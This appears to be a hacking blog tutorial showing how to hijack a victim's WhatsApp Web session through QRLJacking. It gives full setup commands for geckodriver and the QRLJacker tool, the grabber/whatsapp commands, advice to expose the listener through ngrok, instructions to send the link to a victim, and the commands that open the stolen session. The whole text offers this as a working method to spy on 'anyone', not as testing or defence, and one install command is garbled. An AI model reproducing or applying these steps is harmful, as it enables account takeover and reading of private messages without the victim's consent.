How to QRL Jacking | Make Access On Anyone WhatsApp Without Touch | 2022 Working

The most asked question to me from newbies in hacking is the "How To Hack Whatsapp Without Touching Victim Device", So today I show you how actually hacker/attacker makes access to victim's account without even touching or asking for any OTP from victim just using social engineering technique.

Before diving into this information let me clear you one thing so it's easy to understand what we are going to do. Whatsapp has end-to end encryption so it's near to impossible to directly spy or read victim Whatsapp messages, different methods are used in different conditions and situations like MacSpoofing, OTP Phishing, SS7, and some others.

QRLJacking

In this article, I'll show you a method known as QRLJacking in which attacker/hacker send a 

 link to the target device and make them scan their QR code of WhatsApp, so attacker/hacker is able to catch the WhatsApp web session in which they can read/spy or respond messages.

Requirements

•> Linux/macOS (Linux Recommended)

•> Firefox Latest Version

•> Python 3.7+

I am going to show a Linux tutorial in this article.

Steps

•> First of all, you have to download the driver for firefox and setup in your Linux system using the commands given below:

wget https://github.com/mozilla/geckodriver/releases/download/v0.30.0/geckodriver-v0.30.0-linux64.tar.gz

tar -xvf geckodriver-v0.30.0-linugeckodriver

chmod +x geckodriver

sudo mv -f geckodriver /usr/local/share/geckodriver

sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver

sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver

sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

•> Now download and set up the QRLJacking tool given commands

git clone https://github.com/OWASP/QRLJacking

cd QRLJacking/QRLJacker

pip install -r requirements.txt

python3 QrlJacker.py

Now the QRLJacker interface opens on your Terminal as shown in the image.

Now we are ready to perform vector QR Jacking attack, type given commands:

use grabber/whatsapp

set port 4444

run

I am testing this tool on my localhost (You can do port forwarding for out of LAN devices and recommend use ngrok for it) so my port is 4444 and the host is 0.0.0.0 in this tutorial. So in my case, the QR code link is 0.0.0.0:4444.

Now send that link to victim and once victim scanned their WhatsApp web QR code, hacker/attacker get a session saved on this tool to later access a WhatsApp Web session.

•> Press Ctrl +C to intercept the QRJacker tool and type commands given below:

sessions

•> Now the list of saved sessions is shown on your Terminal (In my case "0")

sessions -i 0

Now wait a few seconds and Firefox automatically launched and you get a WhatsApp web session of victim as shown in the image given below.

I hope this information is helpful for you and if you still face any problems or errors then feel free to reach me.

 Thanks for watching